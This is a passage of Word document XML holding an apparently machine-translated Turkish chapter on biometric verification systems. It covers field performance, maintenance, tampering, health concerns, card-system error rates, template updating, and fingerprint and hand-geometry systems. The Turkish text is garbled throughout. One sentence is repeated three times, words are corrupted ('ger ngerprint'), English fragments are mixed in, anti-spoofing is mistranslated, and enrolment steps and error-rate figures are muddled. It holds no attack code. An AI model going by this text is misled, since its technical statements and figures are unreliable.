        <w:t>Biyometrik tanımlayıcı doğrulama sistemlerinin saha performansı genellikle üreticilerin veya laboratuvar testlerindeki deneyimlerden farklıdır. Söz verilmiş performansı sağlamayan bir sisteme takılmamak için iki yol vardır. İlk olarak, bağımsız ve tarafsız bir test kuruluşu tarafından test edilen teknolojilere ve sistemlere yönelik düşünceleri sınırlandırın. New Mexico, Albuquerque'de bulunan Sandia Ulusal Laboratuvarları, Enerji Bakanlığı için uzun yıllardır biyometrik sistem testleri yapmıştır ve bazı raporları mevcuttur. İkincisi, herhangi bir sistem üreticisi veya satış temsilcisi, şu anda sistemlerini kullanan kuruluşların bir listesini sunabilmelidir. Uygulaması şu anda planlananlara benzeyen kullanıcıları belirtebilmelidirler (planlanan işlem yeni ve benzersiz bir uygulama değilse).Ayrıntılı tartışmalar ve belki de bir site ziyareti, benzer uygulama gereksinimlerine sahip mevcut kullanıcılar ile çoğu soruya cevap vermeli ve birçok sürprizle karşılaşmamalıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc9978695"/>
      <w:bookmarkStart w:id="39" w:name="_Toc9979177"/>
      <w:r w:rsidRPr="00076917">
        <w:t>1.15. Donanım ve Yazılım Sağlamlığı</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00076917">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Küçük ve orta ölçekli kullanıcı veritabanlarında çok etkili olan bazı sistemler ve teknolojiler, büyük veritabanlarında kabul edilemez olan bir performansa sahiptir. Ortaya çıkan sorunlar arasında sistem yavaşlaması ve hassasiyetin bozulması bulunur. Bazı biyometrik sistem kullanıcıları, sistemlerini atmak ve kuruluşlarının daha başarılı olması, beklenenden daha hızlı büyümesi ve eski sistemin büyümeyle başa çıkamaması nedeniyle baştan başlamak zorunda kaldı. Kuruluşla orijinal sistemlerini “büyütmeyi” umarlarsa, sistem yöneticileri en iyimser büyüme tahminini en az iki katına çıkarmalı ve bu yükü kaldırabilecek bir sistem için plan yapmalıdır. Bir diğer husus, beklenen şartlar altında genişletilmiş kullanıma dayanacak donanım yeteneğidir. Bir örnek, erken imza dinamik sistemleridir.Bu test sırasında ve erken gelişim döneminde yeterli bir şekilde gerçekleştirilmiştir. Ancak, vuruş yönü, hızı ve basıncı tespit etmek için kullanılan kalem ve ekran sensörleri çok küçük ve hassastır. Aylar veya bir yıllık normal kamusal kullanımdan sonra, sistem performansı, sistemlerin artık etkili tanımlayıcıları olmadığı noktalara düşmüştür.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc9978696"/>
      <w:bookmarkStart w:id="41" w:name="_Toc9979178"/>
      <w:r w:rsidRPr="00076917">
        <w:t>1.16. Maintenance Requirements</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00076917">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Bazı sensörler ve sistemler, etkili işlemlere devam etmek için çok yüksek seviyede önleyici bakım veya teşhis ve ayar gerektirmiştir. Belirli işletme ve kullanıcı koşullarında (örneğin, tozlu alanlar veya sık sık el losyonu veya krem ​​kullananlar), bazı parmak izi sensörlerinin doğruluğun bozulmasını önlemek için her gün olduğu kadar sık ​​temizlenmesi gerekir. Diğer sistemler haftalık veya aylık olarak teşhis ekipmanlarının bağlanması, performans parametrelerinin değerlendirilmesi ve üretken performansı korumak için dikkatli ayar yapılmasını talep ediyordu. Bu insan müdahaleleri sadece normal güvenlik sürecini </w:t>
      </w:r>
      <w:r w:rsidRPr="00076917">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>bozmakla kalmıyor, aynı zamanda işletme maliyetlerini de önemli ölçüde artırıyor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc9978697"/>
      <w:bookmarkStart w:id="43" w:name="_Toc9979179"/>
      <w:r w:rsidRPr="00423684">
        <w:t>1.17. Sabotaj Duyarlılığı</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00423684">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Duvarlardan uzaktaki ya da birçok hareketli parçadan çıkıntı yapan kaide üzerinde veri toplama sensörleri bulunan sistemler, genellikle hasarı sabote etmeye veya devre dışı bırakmaya duyarlıdır. Eğirme zemini cilalayıcı kulpları veya ceplerinden çıkan çekiçler göze çarpmayan veya yanlışlıkla sensörleri etkileyebilir. Bu olaylar, sıklıkla yaygın kullanıcı veya biyometrik sisteme sendika direnci olduğunda meydana gelmiştir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc9978698"/>
      <w:bookmarkStart w:id="45" w:name="_Toc9979180"/>
      <w:r w:rsidRPr="00BD2D12">
        <w:t>1.18. Kullanım Nedeniyle Algılanan Sağlık Maladies</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD2D12">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Yeni sistemler ve teknolojiler geliştirilip AIDS, Ebola ve E. coli gibi yeni virüs ve hastalıklara karşı halkın duyarlılığı büyüklük sırasına göre arttıkça, kabul edilebilirlik daha önemli bir konu haline geldi. Olası organ hasarı ve hastalığın biyometrik sistem kullanımından kaynaklanan potansiyel yayılma algıları, nihayetinde, bir sistemin satışları üzerinde tamamen yeniden tasarlanması gereken yıkıcı bir etki yarattı. Her ne kadar orjinal ünitelerin binlerce tanesi başarılı bir şekilde tanımlanmış olsa da, yeni paketlenmiş teknolojinin popülaritesini yeniden kazanıp kazanmadığı ya da hayatta kalmadığı görülüyor. Bunların tümü, bir sistemin tek kullanımlık bir sonucu olarak, sistem kullanımı sonucunda hastalanan veya yaralanan olduğu iddiası bile olmadı. Son zamanlarda ortaya çıkan bulaşıcı hastalıkların birçoğu kirlenmiş bir yüzeye basit temasla yayılabilir.Biyometrik sistemler birçok uygulamada daha geniş pazar penetrasyonu sağladığından, kullanıcı sayıları logaritmik olarak artmaktadır. Biyometrik verilerin alınması için kullanıcıların fiziksel olarak temasa geçilmesini gerektiren sistemler ve teknolojiler konusunda giderek daha hassas hale geldiğine dair göstergeler gelişmektedir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc9978699"/>
      <w:bookmarkStart w:id="47" w:name="_Toc9979181"/>
      <w:r w:rsidRPr="00DB2EC9">
        <w:t>1.19. Yönetime Sunulan Özel Bilgiler</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB2EC9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bazı sağlık olayları, göz küresi içindeki kan damarı paterninde (yani retinada) değişikliklere neden olabilir. Bunlar diyabet ve felç içerir. Retina bazlı biyometrik sistemin, yönetimin, sistem kullanıcılarının zararına kullanılabilecek sağlık bilgilerinin uygunsuz bir şekilde elde edilmesini sağladığına dair iddialar yapılmıştır. Senaryo, rutin bir kullanıcıyı tanımlayamayan sistemle başlar. Kullanıcı kolayca doğrulanır ve tekrar kaydedilir. Sonuç olarak, yönetimin yeniden kayıt raporunu not edeceği ve bu kullanıcının sağlıkla ilgili küçük bir olayı olduğu sonucuna varılacak (kullanıcı ertesi iş günü mevcut olduğu için küçük). Bu çalışanın bir sonraki sağlık olayının önemli bir tıbbi maliyete neden olacağı beklentisiyle, yönetim fesih nedeni bulabilir (veya yaratabilir). Bu iddia edilen senaryonun fiili bir oluşumu olmadığı gerçeğine rağmen,Bu folklor biyometrik endüstris</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>inde duyulmaya devam ediyor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc9978700"/>
      <w:bookmarkStart w:id="49" w:name="_Toc9979182"/>
      <w:r w:rsidRPr="007B6A3F">
        <w:t>1.20. Kart Sistemlerine Göre Biyometrik Tanımlamanın Özellikleri</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B6A3F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Biyometrik tanımlayıcı doğrulama sistemleri insanları kontrol eder. Doğru eli, gözü, yüzü, imzası veya sesi olan kişi bulunmuyorsa, tanımlama ve doğrulama yapılamaz ve istenen işlem (örneğin portal geçişi, veri veya kaynak erişimi) gerçekleşmez. Çoğu zaman gösterdiği gibi, rakipler ve suçlular PIN ekleme gerektiren kartlar bile olsa erişim kartlarını alıp başarılı bir şekilde kullanıyorlar. </w:t>
      </w:r>
      <w:r w:rsidRPr="007B6A3F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Bunun nedeni, bu sistemlerin insanlar yerine yalnızca plastik parçaları (ve bazen bilgileri) kontrol etmeleridir. Gerçek varlık ve kaynak koruması, kartlar ve bilgilerle değil insanlar tarafından gerçekleştirilebilir, çünkü yetkisiz kişiler kartları ve bilgileri alabilir. Ayrıca, yaşam döngüsü maliyetleri önemli ölçüde azalır, çünkü kart veya PIN yönetim sistemi veya personel gerekmez.Yetkili kişi fiziksel özelliklerini (yani eller, yüz, gözler, imza veya ses) kaybetmez, ancak kartlar ve PIN'ler sürekli olarak kaybolur, çalınır veya unutulur. Bu nedenle, kart erişim sistemlerinin, sistemlerin ve insanların (yeni) kartları ve PIN'leri yönetmesini, kontrol etmesini, kaydetmesini ve vermesini gerektirir. Üstelik, kartlar pahalı ve tekrar eden bir maliyettir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc9978701"/>
      <w:bookmarkStart w:id="51" w:name="_Toc9979183"/>
      <w:r w:rsidRPr="009B3810">
        <w:t>1.21. Kart Sistemi Hata Oranları</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC0F25">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Erişim kartı yanlış ellerde, kaybolduğunda veya çalındığında yanlış kabul oranı yüzde 100'dür. Sağ kart yanlış şekilde kaydırıldığında ya da sadece sistemi etkinleştirmediğinde yanlış bir reddetmedir. (Kapının kilidini açmak için otel odası erişim kartlarını tekrar denemek için kaç kere düşünün.) Aslında, bir kart unutulduğunda ve bu kişi kapıdan geçemediğinde yanlış bir reddetmedir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc9978702"/>
      <w:bookmarkStart w:id="53" w:name="_Toc9979184"/>
      <w:r w:rsidRPr="00CC0F25">
        <w:t>1.22. Biyometrik Veri Güncellemeleri</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC0F25">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Zaman içinde değişiklik gösterebilecek ölçüm özelliklerine ve özelliklerine dayalı teknolojiler kullanan bazı biyometrik sistemler, veritabanı her kullanımda güncellendiğinde en iyi şekilde çalışır. Bunlar öncelikle “yaptığımız” teknolojilerdir (ses, imza ve tuş vuruşu). Bütün sistemler bunu yapmaz. Bu sistemler tarafından ölçülen eylem zaman içinde kademeli olarak değişir. Ses insanlar yaşlandıkça değişir. Ayrıca ağırlıktaki değişikliklerden ve bazı sağlık koşullarından da etkilenir. Zaman içindeki imza değişiklikleri kolayca belgelenir. Örneğin, ilk başkanlığının başında Franklin D. Roosevelt imzasına bakın. Her isim ve başlangıç ​​açıkça görülebilir. Daha sonra, sadece sekiz yıl sonra üçüncü döneminde imza ile karşılaştırın. Kendisine aşina olanlar için, vuruşlar ve çizgiler açıkça başkanın imzasıdır; ama başkalarına,adıyla veya başka bir kelimeyle hiçbir ilişkisi yoktur. Tuş vuruş desenleri, zamanla, özellikle yazma sıklığına bağlı olarak benzer şekilde değişir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00143047">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Veritabanını güncelleyen sistemler, tanımlama işlemi tamamlandıktan sonra mevcut girdi verilerini veri tabanı şablonuna ortalar. Bazıları daha eski bir veri girişini de siler ve bu veritabanını hareketli bir ortalama yapar. Girdi verilerindeki bu kademeli değişiklikler, kullanıcı kimliğini aylarca veya yıllarca etkilemeyebilir. Bununla birlikte, veri tabanı dosyası ve giriş verileri birbirinden ayrıldıkça, giderek artan şekilde yanlış yapılan reddedilmeler, yeniden kaydolmanın dikte edilmesi için yeterin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ce rahatsızlık yaratacaktır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc9978703"/>
      <w:bookmarkStart w:id="55" w:name="_Toc9979185"/>
      <w:r w:rsidRPr="00866166">
        <w:t>1.23. Farklı Biyometrik Sistem Çeşitleri ve Özellikleri</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00866166">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bu bölümde farklı biyometrik sistemler açıklanmaktadır: ger ngerprint sistemleri, el geometrisi sistemleri, ses paterni sistemleri, retina paterni sistemleri, iris paterni sistemleri ve imza dinamiği sistemleri. Her sistem için, aşağıdaki özellikler açıklanmaktadır: kayıt prosedürü ve zamanı, şablon veya dosya boyutu, gereken kullanıcı eylemi, sistem yanıt süresi, herhangi bir sahteciliği önleme yöntemi, doğruluk, alan geçmişi, yaşanan sorunlar ve benzersiz sistem özellikleri .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00866166">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Parmak İzi Sistemleri Bu bölümdeki bilgiler, teknolojisi parmak izine dayanan birkaç biyometrik tanımlayıcı doğrulama sistemi hakkındaki bilgilerin bir </w:t>
      </w:r>
      <w:r w:rsidRPr="00866166">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>derlemesidir. Veri Toplama Parmak izi verileri, nesneler sık ​​sık camlarına veya polikarbonat plakalara bastırıldığında elde edilir. Ekranda görüntü kaydedilmemiş. Sırtların, genel hatların, çizgilerin, çatallanmaların ve kesişmelerin göreceli konumu ile ilgili bilgiler kayıtlı bir kullanıcı veri tabanı olarak depolanır ve daha sonra kullanıcı giriş verileri ile karşılaştırılır. Kayıt Prosedürü ve Zaman Belirtildiği gibi, konu tuş takımına bir ila dokuz haneli PIN girer. İşaretlendiği gibi, düğme okuyucu plaka üzerine yerleştirilir ve ardından çıkartılır. Dijitalleştirilmiş bir kod oluşturulur. İşaretlendiği gibi, kalibratör kalibrasyonu için cihaz dört kez daha yerleştirilir ve çıkarılır. Gerekli toplam kayıt süresi iki dakikadan az.Şablon veya Dosya Boyutu Parmak İzi kullanıcı dosyaları genellikle 500 ila 1500 bayt arasındadır. Kullanıcı Eylemleri Gerekli Neredeyse tüm parmak izi bazlı biyometri, doğrulama sistemleridir. Kullanıcı, klavyeden bir PIN girerek veya bir kart okuyucu kullanarak tanımlamayı belirtir ve ardından okuyucu plakasına bir numara yerleştirir. Sistem Tepki Süresi Onaylandı ve onaylanmadı kararının görsel ve sesli bir şekilde bildirilmesi, yedi saniyede gerçekleşir.Sistem Tepki Süresi Onaylandı ve onaylanmadı kararının görsel ve sesli bir şekilde bildirilmesi, yedi saniyede gerçekleşir.Sistem Tepki Süresi Onaylandı ve onaylanmadı kararının görsel ve sesli bir şekilde bildirilmesi, yedi saniyede gerçekleşir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00A80923">
        <w:t>Doğruluk</w:t>
      </w:r>
      <w:r w:rsidRPr="0001128B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0001128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bazı parmak izi sistemleri, hatalı kabul oranını yüzde 0,0 olarak elde etmek için ayarlanabilir. Sandia National Laboratories, 1991 ve 1993 yıllarında en yüksek dereceli bir baskı sistemi testinde üç kez hatalı bir reddetme oranı olan% 9,4'ü ve% 5'lik bir çaprazlama hata oranını üretti. Alan Tarihi Örneğin, devlet yararlarının ödenmesi için erişim kontrolü ve kimlik doğrulaması için binlerce birim belirlenmiştir. Sorunlar Büyük kullanıcı popülasyonuna sahip deneyimli Sistem operatörlerinin, derinin derisini ve sistem doğruluğunu olumsuz yönde etkileyen kiri temizlemek için sensör plakalarını sık sık temizlemek için sık sık ihtiyaç duyulur. Eşsiz Sistem Yönleri Kir birikmesi probleminden kaçınmak için yeni geliştirilen bir baskı sistemi, baskı görüntüsünü ultrasonla elde eder. Bu sistemin lateks eldivenli bir cerrahın baskı iznini alabildiği iddiaları yapılmıştır.Bir dizi şirket, baskıya dayalı biyometrik tanımlama sistemleri üretiyor.&lt;br&gt;El Geometrisi Sistemi El geometrisi verisi, el ve uzunlukların uzunluk, genişlik ve yüksekliğinin üç boyutlu kaydıdır, aynı anda dikey ve yatay kamera görüntüleri ile elde edilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0001128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Kayıt Prosedürü ve Zaman Konu, elinizi between parmakların arasına mandallara karşı yerleştirilmiş bir ızgara plakasına yerleştirmek üzere yönlendirilir. Dört konumlu lamba, ellerin uygun şekilde konumlandırılmasını sağlar. Dijital kamera, yan görünüm için 45 derecelik bir ayna kullanarak üstten bir yandan ve yandan bir görünüm kaydeder. Konu çekilmeye ve daha sonra eli iki kez daha konumlandırmaya yönlendirilir. Okunan değerlerin tek bir kodda ortalaması alınır ve bir PIN verilir. Toplam kayıt süresi iki dakikadan az. Şablon veya Dosya Boyutu El geometrisi kullanıcı boyutu dokuz bayttır. Gerekli Kullanıcı İşlemleri El geometrisi sistemi sadece bir tanımlayıcı olarak çalışır. Kullanıcı bir tuş takımına bir PIN girerek veya bir kart okuyucu kullanarak kimlik belirleme sağlar. Ünite ekranında “el koy” mesajı göründüğünde, kullanıcı elini plaka üzerine mandallara yerleştirir. Dört ışık da doğru el pozisyonunu doğruladığında, veriler elde edilir </w:t>
      </w:r>
      <w:r w:rsidRPr="0001128B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ve “el kaldır” mesajı görüntülenir. Sistem Müdahale Süresi Onay ya da onaylama kararının görsel ve sesli uyarısı üç ila beş saniye içinde gerçekleşir. Rekabet Karşıtı Metod Üretici, “sistem, canlı bir elin kullanılmasını sağlamak için kontrol eder” diyor. Accuracy Sandia National Laboratories testleri, tek denenmiş bir yanlış kabul oranını% 0,1'den daha az, üç denemeli bir yanlış kabul oranını% 0,1'den daha az ürettiğini belirtti. ve yüzde 0.2 ve 2.2 çaprazlama hata oranları (yani iki test). Alan Tarihi Erişim kontrolü, kolej kafeteryaları ve yurtlar ve devlet tesisleri için binlerce birim seçildi. El geometrisi, Enerji Bölümü ve Göçmenlik ve Vatandaşlığa Kabul Hizmeti'nin tercih ettiği orijinal biyometrik sistemdi. Ayrıca, Atlanta'daki 1996 Olimpiyatları'nda Sporcunun Köyü'nü korumak için de kullanıldı.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00395E54" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00395E54">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Deneyimli Sorunlar Bazı uygulamalardan bazıları ilk Sandia testinin doğruluk sonuçlarına ulaşmamıştır. Kullanıcı veritabanları yüzlerce olduğunda, doğrulama doğruluğunun, veritabanları binler arasında büyüdüğü zaman kötüleştiğine dair göstergeler olmuştur. Eşsiz Sistem Yönleri Dokuz baytlık el geometrisi kullanıcı kodu, şu ana kadar mevcut biyometrik sistemlerin en küçüğüdür. El geometrisi tanımlama sistemleri Recognition Systems, Inc. Tarafından üretilir. İki geometri tanımlama sistemi olan bir varyasyon BioMet Partners tarafından üretilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
